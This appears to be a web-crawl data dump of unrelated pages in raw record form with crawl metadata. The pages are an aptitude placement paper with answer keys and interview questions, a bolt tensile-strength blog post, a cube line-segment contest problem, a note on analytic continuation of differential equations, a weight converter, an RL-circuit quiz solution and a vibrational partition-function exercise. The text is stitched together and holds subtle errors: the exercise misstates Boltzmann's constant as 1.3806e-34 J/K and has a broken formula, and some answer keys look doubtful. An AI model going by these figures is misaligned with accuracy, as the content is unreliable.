eliminated.\n\nStatement 2: From this statement, we know that the value of X > Y. From the given combinations, X can take more than one value. Hence, using the information in statement 2, we will not be able to find the value of X. Therefore, we can eliminate answer choice (B).\n\nCombining the two statements, we know that X is odd and that the value of X > Y.\nValues of X and Y that satisfy both the conditions include X taking the value of -1, -3 and -5.\n\nAs the information provided in the two statements independently or together are not sufficient to answer the question, the correct answer is Choice (E).\n\nVerbal Ability\n\nDirections—(Q. 1–15) Read the following passage carefully and answer the questions given below it.Certain words have been printed in bold to help you locate them while answering some of the questions.\n\nGoldman Sachs predicted that crude oil price would hit \\$200 and just as it appeared that alternativerenewable energy had a chance of becoming an economically viable option, the international price ofoil fell by over 70%. After hitting the all-time high of \\$147 a barrel, a month ago, crude oil fell to lessthan \\$40 a barrel. What explains this sharp decline in the international price of oil? There has not beenany major new discovery of a hitherto unknown source of oil or gas. The short answer is that thedemand does not have to fall by a very sizeable quantity for the price of crude to respond as it did. In\n\nthe short run, the price elasticity of demand for crude oil is very low. Conversely, in the short run, evena relatively big change in the price of oil does not immediately lower consumption. It takes months, oryears, of high oil price to inculcate habits of energy conservation. World crude oil price had remainedat over \\$60 a barrel for most of 2005-2007 without making any major dent in demand.\n\nThe long answer is more complex. The economic slowdown in the US, Europe and Asia along withdollar depreciation and commodity speculation have all had some role in the downward descent in theinternational price of oil. In recent years, the supply of oil has been rising but not enough to catch upwith the rising demand, resulting in an almost vertical escalation in its price. The number of crude oilfutures and options contracts have also increased manifold which has led to significant speculation inthe oil market. In comparison, the role of the Organization of Petroleum Exporting Countries (OPEC)\n\nin fixing crude price has considerably weakened. OPEC is often accused of operating as a cartelrestricting output thus keeping prices artificially high. It did succeed in setting the price of crude duringthe 1970s and the first half of the 80s. But, with increased futures trading and contracts, the control ofcrude pricing has moved from OPEC to banks and markets that deal with futures trading and contracts.It is true that most oil exporting regions of the world have remained politically unstable fuelling speculation over the price of crude. But there is little evidence that the geopolitical uncertainties in westAsia have improved to weaken the price of oil. Threatened by the downward slide of oil price, OPEChas, in fact, announced its decision to curtail output.\n\nHowever most oil importers will heave a sigh of relief as they find their oil import bills decline except for those who bought options to import oil at prices higher than market prices. Exporting nations, on the other hand, will see their economic prosperity slip. Relatively low price of crude is also bad newsfor investments in alternative renewable energy that cannot compete with cheaper and non-renewable\n\nsources of energy.\n\n1. Why are oil importing countries relieved ?\n\n(A) Price of crude reached \\$ 147 not \\$ 200 as was predicted\n\n(B) Discovery of oil reserves within their own territories\n\n(C) Demand for crude has fallen sharply\n\n(D) There is no need for them to invest huge amounts of money in alternative sources of energy\n\n(E) None of these\n\nAns : (E)\n\n2. Which of the following factors is responsible for rise in speculation in crude oil markets ?\n\n1. OPEC has not been able to restrict the oil output and control prices\n\n2. The supply of oil has been rising to match demand\n\n3. Existence of large number of oil futures and oil contracts\n\n(A) Only 1\n\n(B) Both 1 & 2\n\n(C) Only 3\n\n(D) All 1, 2 & 3\n\n(E) None of these\n\nAns : (C)\n\n3. What does the phrase “the price elasticity of demand for crude oil is very low” imply ?\n\n(A) When the price rises the demand for crude oil falls immediately\n\n(B) A small change in demand will result in a sharp change in the price of crude\n\n(C) Within a short span of time the price of crude oil has fluctuated sharply\n\n(D) Speculation in oil does not have much of an impact on its price\n\n(E) None of these\n\nAns : (E)\n\n4. Which of the following is/are TRUE in the context of the passage ?\n\n1. The decline in oil prices has benefited all countries\n\n2. Renewable energy sources are costlier than non-renewable ones\n\n3. Lack of availability of alternative renewable energy resulted in rise in demand for crude\n\n(A) Only 2\n\n(B) Both 1 & 2\n\n(C) Both 2 & 3\n\n(D) Only 3\n\n(E) None of these\n\nAns : (D)\n\n5. What has been the impact of the drop in oil prices ?\n\n(A) Exploration for natural gas resources has risen\n\n(B) The dollar has fallen sharply\n\n(C) OPEC has decided to restrict its production of oil\n\n(D) Economic depression in oil importing countries\n\n(E) Drastic fall in demand for crude oil\n\nAns : (C)\n\nRead each sentence to find out whether there is any grammatical error or\n\nidiomatic error in it. The error, if any, will be in one part of the sentence. The letter of that part is the answer. If there is no error, the answer is (E) (Ignore errors of punctuation, if any.)\n\n31. He has taken care to (A) / compliance with the norms (B) / so he expects the proposal (C) / to beapproved without delay. (D) No error (E)\n\nAns : (B)\n\n32. Under the terms of the new deal (A) / the channel can broadcast (B) / the next cricket tournament tobe (C) / played among India and Australia. (D) No error (E)\n\nAns : (D)\n\n33. Our equipment gets damage (A) / very often in summer (B) / because there are (C) / frequent powercuts. (D) No error (E)Ans : (A)\n\nTechnical and HR Questions\n\nHow to know if there are expensive sql statements running?\n\nWhat will you do then to improve the response time?\n\nHow to check if your r/3 system is 32bit or 64bit?\n\nHow to check if your R3 system is unicode or non-unicode?\n\nHow many types of organization data?\n\nWhat is data consistency?\n\nWhat is the difference between normal report program and module pool program?\n\nHow many windows can be maintained under one page?\n\nImagine that ten years from now a colleague is describing you to a new employee. What will s/he say\n\nWhat are the document needed to create a test case?How u tell it is test case?\n\nWhat is Thread ?(VC++)What is the difference between Cmutex and Csemaphone?\n\nWhat?s the difference between Response.Write() andResponse.Output.Write()?\n\nWhat is Initialization Purpose?\n\nEvents in Reports?\n\nWhat the Recording Purpose?\n\nQuestions from resume specially from educational background,\nWhich was the subject u hate most – I said Maths, I explained the reason, Then He agreed with me\nWhich subject u love – I said Java,\n\nC++,HTML,XML\n\nOops concepts\n\nInheritance\n\nDiff between Oracle9i, Oracle10g, and Oracle11i ?? Give me Examples\n\nCan u write a program with dynamically allocation of variable?\n\nCan u rite a Javasacript programe ??\n\nWhat are control statements in c ?\n\nFamily Background\n\nSome Gk questions related to ministers" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9220487,"math_prob":0.9540733,"size":16770,"snap":"2022-27-2022-33","text_gpt3_token_len":4592,"char_repetition_ratio":0.1174997,"word_repetition_ratio":0.04563926,"special_character_ratio":0.27906978,"punctuation_ratio":0.09672949,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9540593,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-15T13:05:09Z\",\"WARC-Record-ID\":\"<urn:uuid:a6842fa7-958d-492f-ac1d-7583b331e750>\",\"Content-Length\":\"114957\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7ab5f98c-2ce4-4001-8ad4-17096efa606b>\",\"WARC-Concurrent-To\":\"<urn:uuid:27302548-ab69-491c-9766-5cd23658a131>\",\"WARC-IP-Address\":\"104.21.84.134\",\"WARC-Target-URI\":\"https://www.simplyfreshers.com/atos-origin-placement-paper-2012/\",\"WARC-Payload-Digest\":\"sha1:IW2UNWXMICTNWBHDUBUJYWPQOJ4E36QF\",\"WARC-Block-Digest\":\"sha1:O56OKUGO7CJWECCCRFA4EB2WUWIBXKT5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882572174.8_warc_CC-MAIN-20220815115129-20220815145129-00415.warc.gz\"}"}
https://tyfastener.com/uncategorized/the-method-of-calculating-tensile-strength-of-hexagon-socket-head-bolts/
[ "# Blog\n\nBack to Blog\n\n## The Method of Calculating Tensile Strength of Hexagon Socket Head Bolts\n\nStrength is the bearing capacity per unit area, is an indicator.\nFormula: Bearing capacity = strength x area;\nThreaded bolt, M24 bolt cross-sectional area is not the diameter of the circular area of 24, but 353 mm2, called the effective area.\n\nNormal Bolt Grade C (grades 4.6 and 4.8) The tensile strength is 170 N / mm 2.\nThen the carrying capacity is: 170×353 = 60010N. Conversion, 1 ton equivalent to 1000KG, equivalent to 10000N, then M24 bolts that can withstand about 6 tons of tension.", null, "Back to Blog" ]
[ null, "http://tyfastener.com/wp-content/uploads/2017/12/TIM截图20171226144614-300x152.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8177137,"math_prob":0.97504157,"size":577,"snap":"2019-43-2019-47","text_gpt3_token_len":153,"char_repetition_ratio":0.118673645,"word_repetition_ratio":0.0,"special_character_ratio":0.28249568,"punctuation_ratio":0.1440678,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97032344,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-14T11:46:57Z\",\"WARC-Record-ID\":\"<urn:uuid:e6ec6861-ae8f-448a-8154-f1bcc458af2f>\",\"Content-Length\":\"43948\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5bfc454a-914a-43b4-a5c5-d6c115e2dfdf>\",\"WARC-Concurrent-To\":\"<urn:uuid:1e14a013-6cea-4e1e-80c4-4d09b119a8c8>\",\"WARC-IP-Address\":\"192.81.135.27\",\"WARC-Target-URI\":\"https://tyfastener.com/uncategorized/the-method-of-calculating-tensile-strength-of-hexagon-socket-head-bolts/\",\"WARC-Payload-Digest\":\"sha1:QH7O6OVLJGRNDV7WKIO3OF3LV5HXHNT7\",\"WARC-Block-Digest\":\"sha1:MUDIMPIKFXU7GH5OJ2QGXFKBOTFC3CU5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496668416.11_warc_CC-MAIN-20191114104329-20191114132329-00302.warc.gz\"}"}
https://artofproblemsolving.com/wiki/index.php/1996_AHSME_Problems/Problem_10
[ "# 1996 AHSME Problems/Problem 10\n\n## Problem\n\nHow many line segments have both their endpoints located at the vertices of a given cube?", null, "$\\text{(A)}\\ 12\\qquad\\text{(B)}\\ 15\\qquad\\text{(C)}\\ 24\\qquad\\text{(D)}\\ 28\\qquad\\text{(E)}\\ 56$\n\n## Contents\n\n### Solution 1\n\nThere are", null, "$8$ choices for the first endpoint of the line segment, and", null, "$7$ choices for the second endpoint, giving a total of", null, "$8\\cdot 7 = 56$ segments. However, both", null, "$\\overline{AB}$ and", null, "$\\overline{BA}$ were counted, while they really are the same line segment. Every segment got double counted in a similar manner, so there are really", null, "$\\frac{56}{2} = 28$ line segments, and the answer is", null, "$\\boxed{D}$.\n\nIn shorthand notation, we're choosing", null, "$2$ endpoints from a set of", null, "$8$ endpoints, and the answer is", null, "$\\binom{8}{2} = \\frac{8!}{6!2!} = 28$.\n\n### Solution 2\n\nEach segment is either an edge, a facial diagonal, or a long/main/spacial diagonal.\n\nA cube has", null, "$12$ edges: Four on the top face, four on the bottom face, and four that connect the top face to the bottom face.\n\nA cube has", null, "$6$ square faces, each of which has", null, "$2$ facial diagonals, for a total of", null, "$6\\cdot 2 = 12$.\n\nA cube has", null, "$4$ spacial diagonals: each diagonal goes from one of the bottom vertices to the \"opposite\" top vertex.\n\nThus, there are", null, "$12 + 12 + 4 = 28$ segments, and the answer is", null, "$\\boxed{D}$.\n\nThe problems on this page are copyrighted by the Mathematical Association of America's American Mathematics Competitions.", null, "" ]
[ null, "https://latex.artofproblemsolving.com/3/b/9/3b94b6727c87da629bddb3ea6c9c750d8b7e2ff1.png ", null, "https://latex.artofproblemsolving.com/8/4/5/8455f3b5cb3b4880b8c9d782a5c1f0334db819eb.png ", null, "https://latex.artofproblemsolving.com/e/0/a/e0a0db32027a732ac57d37ef2ae9bb150f65b108.png ", null, "https://latex.artofproblemsolving.com/9/2/f/92f53df4fe169afe4ae861f0ff251c939e69fcf3.png ", null, "https://latex.artofproblemsolving.com/8/4/0/840e2b592390eb6ec918fa6f3292716ce170de66.png ", null, "https://latex.artofproblemsolving.com/6/b/b/6bba4a6433bf5e62d09d40bfbb8a5db10ef9d19a.png ", null, "https://latex.artofproblemsolving.com/2/b/b/2bb595941368967d3b1431f01982da4214fb026f.png ", null, "https://latex.artofproblemsolving.com/5/5/b/55bdade53f471aab49f63d1a734979cc0c636640.png ", null, "https://latex.artofproblemsolving.com/4/1/c/41c544263a265ff15498ee45f7392c5f86c6d151.png ", null, "https://latex.artofproblemsolving.com/8/4/5/8455f3b5cb3b4880b8c9d782a5c1f0334db819eb.png ", null, "https://latex.artofproblemsolving.com/d/e/3/de3a7670fdf00dd1ff35cea651c1adde05a678f1.png ", null, "https://latex.artofproblemsolving.com/e/d/f/edf074831eb5bc9e61d6d6e09f525a86e3068f6a.png ", null, "https://latex.artofproblemsolving.com/6/0/1/601a7806cbfad68196c43a4665871f8c3186802e.png ", null, "https://latex.artofproblemsolving.com/4/1/c/41c544263a265ff15498ee45f7392c5f86c6d151.png ", null, "https://latex.artofproblemsolving.com/6/2/7/62774e4f2a907dffd5c535d74af2b156e53483c7.png ", null, "https://latex.artofproblemsolving.com/c/7/c/c7cab1a05e1e0c1d51a6a219d96577a16b7abf9d.png ", null, "https://latex.artofproblemsolving.com/f/9/e/f9e04072c67f1bdac2d206313e4c17dbcc672949.png ", null, "https://latex.artofproblemsolving.com/5/5/b/55bdade53f471aab49f63d1a734979cc0c636640.png ", null, "https://wiki-images.artofproblemsolving.com//8/8b/AMC_logo.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89972013,"math_prob":0.99908507,"size":1404,"snap":"2020-45-2020-50","text_gpt3_token_len":377,"char_repetition_ratio":0.12785715,"word_repetition_ratio":0.01831502,"special_character_ratio":0.2962963,"punctuation_ratio":0.106617644,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9993625,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38],"im_url_duplicate_count":[null,7,null,null,null,null,null,4,null,null,null,null,null,4,null,null,null,null,null,null,null,4,null,null,null,null,null,null,null,4,null,null,null,4,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-27T09:13:02Z\",\"WARC-Record-ID\":\"<urn:uuid:06491f79-eeb7-4e4e-b204-119adbd8af9e>\",\"Content-Length\":\"43551\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bf28f019-58b9-47b9-bf78-801a4fddd2c4>\",\"WARC-Concurrent-To\":\"<urn:uuid:34ca6259-9347-4582-b04e-65e34f83832d>\",\"WARC-IP-Address\":\"104.26.10.229\",\"WARC-Target-URI\":\"https://artofproblemsolving.com/wiki/index.php/1996_AHSME_Problems/Problem_10\",\"WARC-Payload-Digest\":\"sha1:NTK5J5GJ434HE4ANCNNQH2USC4BCLNIZ\",\"WARC-Block-Digest\":\"sha1:VOCX3OIH6AKLDZE4AMFHJBKAHUZ72PTC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141191511.46_warc_CC-MAIN-20201127073750-20201127103750-00706.warc.gz\"}"}
https://planetmath.org/PersistenceOfDifferentialEquations
[ "# persistence of differential equations\n\nThe persistence of analytic relations has important consequences for the theory of differential equations", null, "", null, "in the complex plane", null, "", null, ". Suppose that a function", null, "", null, "$f$ satisfies a differential equation $F(x,f(x),f^{\\prime}(x),\\ldots,f^{(n)})=0$ where $F$ is a polynomial", null, "", null, ". This equation may be viewed as a polynomial relation between the $n+2$ functions $\\mathrm{id},f,f^{\\prime},\\ldots,f^{(n)}$ hence, by the persistence of analytic relations, it will also hold for the analytic continuations of these functions. In other words, if an algebraic differential equation holds for a function in some region, it will still hold when that function is analytically continued to a larger region.\n\nAn interesting special case is that of the homogeneous linear differential equation with polynomial coefficients. In that case, we have the principle of superposition which guarantees that a linear combination", null, "", null, "of solutions is also a solution. Hence, if we start with a basis of solutions to our equation about some point and analytically continue them back to our starting point, we obtain linear combinations of those solutions. This observation plays a very important role in the theory of differential equations in the complex plane and is the foundation for the notion of monodromy group and Riemann’s global characterization of the hypergeometric function", null, "", null, "", null, "", null, "", null, ".\n\nFor a less exalted illustrative example, we can consider the complex logarithm. The differential equation\n\n $xy^{\\prime\\prime}+y^{\\prime}=0$\n\nhas as solutions $y=1$ and $y=\\log x$. While the former is as singly valued as functions get, the latter is multiply valued. Hence upon performong analytic continuation, we expect that the second solution will continue to a linear combination of the two solutions. This, of course is exactly what happens; upon analytic continuation, the second solution becomes the solution $y=\\log x+n\\pi i$ where $n$ is an integer whose value depends on how we carry out the analytic continuation.\n\nTitle persistence of differential equations PersistenceOfDifferentialEquations 2013-03-22 16:20:35 2013-03-22 16:20:35 rspuzio (6075) rspuzio (6075) 10 rspuzio (6075) Corollary msc 30A99" ]
[ null, "http://mathworld.wolfram.com/favicon_mathworld.png", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://mathworld.wolfram.com/favicon_mathworld.png", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://mathworld.wolfram.com/favicon_mathworld.png", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://mathworld.wolfram.com/favicon_mathworld.png", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://dlmf.nist.gov/style/DLMF-16.png", null, "http://dlmf.nist.gov/style/DLMF-16.png", null, "http://dlmf.nist.gov/style/DLMF-16.png", null, "http://mathworld.wolfram.com/favicon_mathworld.png", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91289604,"math_prob":0.9991691,"size":2153,"snap":"2020-10-2020-16","text_gpt3_token_len":435,"char_repetition_ratio":0.16845044,"word_repetition_ratio":0.025316456,"special_character_ratio":0.19786344,"punctuation_ratio":0.083798885,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99933565,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-03-29T19:10:25Z\",\"WARC-Record-ID\":\"<urn:uuid:55e91aa8-ecc3-41be-ae83-a4ff7b39de0b>\",\"Content-Length\":\"12857\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ca91f2fe-5f2f-4445-8108-186bef1a47b9>\",\"WARC-Concurrent-To\":\"<urn:uuid:4fc363c2-96ce-4abd-823c-b30810a33f08>\",\"WARC-IP-Address\":\"129.97.206.129\",\"WARC-Target-URI\":\"https://planetmath.org/PersistenceOfDifferentialEquations\",\"WARC-Payload-Digest\":\"sha1:Q72BHGI7UGFQTI54252XH6OY5FZ5SVRQ\",\"WARC-Block-Digest\":\"sha1:2JNPBVFI3BAUD5VNGET46FKYLYEL5NIS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370495413.19_warc_CC-MAIN-20200329171027-20200329201027-00223.warc.gz\"}"}
https://www.quizzes.cc/calculator/weight/milligrams/230
[ "### How much is 230 milligrams?\n\nConvert 230 milligrams. How much does 230 milligrams weigh? What is 230 milligrams in other units? How big is 230 milligrams? Convert 230 milligrams to lbs, kg, mg, oz, grams, and stone. To calculate, enter your desired inputs, then click calculate. Some units are rounded.\n\n### Summary\n\nConvert 230 milligrams to lbs, kg, mg, oz, grams, and stone.\n\n#### 230 milligrams to Other Units\n\n 230 milligrams equals 0.23 grams 230 milligrams equals 0.00023 kg 230 milligrams equals 230 mg\n 230 milligrams equals 0.008113017866 oz 230 milligrams equals 0.0005070636166 lbs 230 milligrams equals 3.621881835E-5 stone" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.72609574,"math_prob":0.99864066,"size":342,"snap":"2020-34-2020-40","text_gpt3_token_len":91,"char_repetition_ratio":0.22781065,"word_repetition_ratio":0.26415095,"special_character_ratio":0.2748538,"punctuation_ratio":0.25974026,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9854574,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-08T06:30:22Z\",\"WARC-Record-ID\":\"<urn:uuid:819c6ddf-43b4-40cb-9456-881dd927919a>\",\"Content-Length\":\"7477\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ffe43bcb-8f02-47a4-8c74-583c6e7d012b>\",\"WARC-Concurrent-To\":\"<urn:uuid:9d6a13d5-6c0f-4db7-b391-5abae7fec7cd>\",\"WARC-IP-Address\":\"3.93.199.172\",\"WARC-Target-URI\":\"https://www.quizzes.cc/calculator/weight/milligrams/230\",\"WARC-Payload-Digest\":\"sha1:ZDZTJRWRXO5NMRZC6U4LX5MXMFPXUNEN\",\"WARC-Block-Digest\":\"sha1:7XCWMNVZ7ZQR7RUSRHPOMDRFSKBUGMGD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439737289.75_warc_CC-MAIN-20200808051116-20200808081116-00110.warc.gz\"}"}
https://ez.analog.com/studentzone/f/discussions/76437/may-studentzone-quiz-solution
[ "Post Go back to editing\n\n# May StudentZone Quiz Solution\n\nQuestion 1:\n\nInclude plots of IL and VR for different tp values: 2τ ,5τ, 10τ.\n\nBefore including the plots we need to compute the proper frequency of the input signal.\n\nTherefore, considering the input values L = 20mH and R = 200Ω we compute the time constant τ.\n\nNote that tp represent only half of the input signal period. In order to obtain the frequency of the square wave we use the following equation:", null, "Using the computed frequency for the input signal, we obtain the following plot corresponding to tp = 2τ.", null, "Figure 1. Plot example for tp = 2τ\n\nUsing the same procedure we compute the frequency for:\n\ntp = 5τ", null, "Figure 2. Plot example for tp = 5τ\n\ntp=10τ", null, "Figure 3. Plot example for tp = 10τ\n\nQuestion 2:\n\nA Capacitor stores energy. What do you think an Inductor stores? Answer in brief." ]
[ null, "https://ez.analog.com/cfs-filesystemfile/__key/communityserver-components-secureimagefileviewer/communityserver-discussions-components-files-125/c823598cfd68c1f43686cb776cca1251.png_2D00_216x46.png", null, "https://ez.analog.com/cfs-filesystemfile/__key/communityserver-components-secureimagefileviewer/communityserver-discussions-components-files-125/8a39c3617216ad9ad16552d08178711c.png_2D00_624x413.png", null, "https://ez.analog.com/cfs-filesystemfile/__key/communityserver-components-secureimagefileviewer/communityserver-discussions-components-files-125/aa2d39dfa09fef88220a64410e45d36a.png_2D00_624x415.png", null, "https://ez.analog.com/cfs-filesystemfile/__key/communityserver-components-secureimagefileviewer/communityserver-discussions-components-files-125/3b3370df92aafc076228b73b35240eb4.png_2D00_624x414.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.80431926,"math_prob":0.98859954,"size":1053,"snap":"2022-40-2023-06","text_gpt3_token_len":256,"char_repetition_ratio":0.11916111,"word_repetition_ratio":0.016216217,"special_character_ratio":0.23076923,"punctuation_ratio":0.120192304,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99940205,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-09T02:57:36Z\",\"WARC-Record-ID\":\"<urn:uuid:c0a7d40f-d1c9-4b1e-bd73-e985d0f5d2cc>\",\"Content-Length\":\"175725\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7a10d9cf-9d6f-4094-afc1-1854ae918fa0>\",\"WARC-Concurrent-To\":\"<urn:uuid:d36257f2-49e3-4646-91cf-5d968d907272>\",\"WARC-IP-Address\":\"23.52.146.177\",\"WARC-Target-URI\":\"https://ez.analog.com/studentzone/f/discussions/76437/may-studentzone-quiz-solution\",\"WARC-Payload-Digest\":\"sha1:QUXEVGM5IFTIR6UK6JYTLQUWJKF77A2I\",\"WARC-Block-Digest\":\"sha1:H6QSQY4TD7RM4JNO6BA5YLKLVTOZALGQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764501066.53_warc_CC-MAIN-20230209014102-20230209044102-00581.warc.gz\"}"}
https://en.wikibooks.org/wiki/Statistical_Thermodynamics_and_Rate_Theories/Sample_problems
[ "Statistical Thermodynamics and Rate Theories/Sample problems\n\nProblem 1\n\nCalculate the probability of a molecule of N2 being in the ground vibrational state at 298 K.\n\nThe probability that a system occupies a given state at an instant of time and a specific temperature is given by the Boltzmann distribution.\n\n$P_{i}={\\frac {\\exp \\left({\\frac {-E_{i}}{k_{B}T}}\\right)}{\\sum _{j}\\exp \\left({\\frac {-E_{j}}{k_{B}T}}\\right)}}$", null, "$P_{i}={\\frac {\\exp \\left({\\frac {-E_{i}}{k_{B}T}}\\right)}{Q}}$", null, "where:\n\n• i is the energy of the specific state, i, of interest\n• kB is Boltzmann's constant, which equals $1.3806\\times 10^{-34}$", null, "JK-1\n• T is the temperature in Kelvin\n\nThe denominator of this function is known as the partition function, Q, which corresponds to the total number of accessible states of the molecule.\n\nThe closed form of the molecular vibrational partition function is given by:\n\n$q_{vib}={\\frac {1}{1-e^{-h\\nu /k_{B}T}}}$", null, "where:\n\n• $\\nu$", null, "is the fundamental vibrational frequency of N2 in s-1\n• h is Planck's constant, which is $6.62607\\times 10^{-34}$", null, "Js\n\nThis is equivalent to Q since only the vibrational energy states are of interest and there is only one molecule of N2. The equation for determining the partition function Q, from molecular partition functions, q, is given by:\n\n$Q={\\frac {q^{N}}{N!}}$", null, "where:\n\n• N is the number of molecules\n\nThe fundamental vibrational frequency of N2 in wavenumbers, ${\\tilde {\\nu }}$", null, ", is 2358.6cm-1 \n\nThe fundamental vibrational frequency in s-1 is given by:\n\n$\\nu ={\\tilde {\\nu }}\\times c$", null, "where\n\n• c is the speed of light, which is $2.9979\\times 10^{10}$", null, "cm/s\n\nFor N2,\n\n$\\nu$", null, "= (2358.6cm-1) \\times (2.9979 \\times 10^{10| cm/s) = 7.0708 \\times 10^{13}[/itex]\n\nFor N2 at 298 K,\n\n$q_{v}=\\left({\\frac {1}{1-e^{-(6.62607\\times 10^{-34}Js\\times 7.0708\\times 10^{13}s^{-1})/(1.3806\\times 10^{-23}JK^{-1}\\times 298K)}}}\\right)=1.000011333$", null, "The vibrational energy levels follow that of a quantum mechanical harmonic oscillator. The energy levels are represented by:\n\n$E_{n}=h\\nu (n+{\\frac {1}{2}})$", null, "where:\n\n• n is the quantum vibrational number, which equals 0, 1, 2,...\n\nFor the ground state (n=0), the energy becomes:\n\n$E_{0}={\\frac {1}{2}}h\\nu$", null, "Since the vibrational zero point energy is not zero, the energy levels are defined relative to the n=0 level. This is used in the molecular partition function above and therefore, the ground state is regarded as having zero energy.\n\nFor N2 the probability of being in the ground state at 298K is:\n\n$P_{0}={\\frac {e^{-E_{0}/k_{B}T}}{q_{v}}}$", null, "$P_{0}={\\frac {e^{(0J)/(1.3806\\times 10^{-23}\\times 298K)}}{1.000011333}}$", null, "$P_{0}=0.999988667$", null, "This means that at room temperature, the probability of a molecule of N2 being in the ground vibrational state is 99.9988667%." ]
[ null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/f8c0d65d13d8d2b4999f4ff7002085ee4de7442a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/1d5bfff84f6258ef0302bff29a491c0524c32069", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/4c63b9eb785079d732e1687b6feebcd1e8784ae7", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/d2c63fcf9a3eb5a7ae765aba57147507cf418d08", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c15bbbb971240cf328aba572178f091684585468", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/aa1723e100af3215278e7316324420621e569de7", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c08ea84e5fd66b0446bd7eeb311a990be8c203bc", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/0d6b66a3de6d14b026bff87c519315d260be4c97", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/abcd13e3f1aea64d6a65e8a9476cd356c67aa7a4", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/cf08806cad71cb0fea32e9f93f2dc12b3cda6a1e", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c15bbbb971240cf328aba572178f091684585468", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c3ecd9c7003e2c09e540154cf989cc2a4a17ad1b", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/5b1a6138745b9e69d9edb93dfcb115599265ba44", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/a95c96f5d84eed0c79290b7a5aac64213066e3cc", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/2080623f9cf002e8e77b7b26df571ca69853cab8", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/87f5f9d4e4be9cf42eab38e085b33db0ac544f6a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/58c6e65c7dc99e5f5d54454f0b96571123efe506", null ]
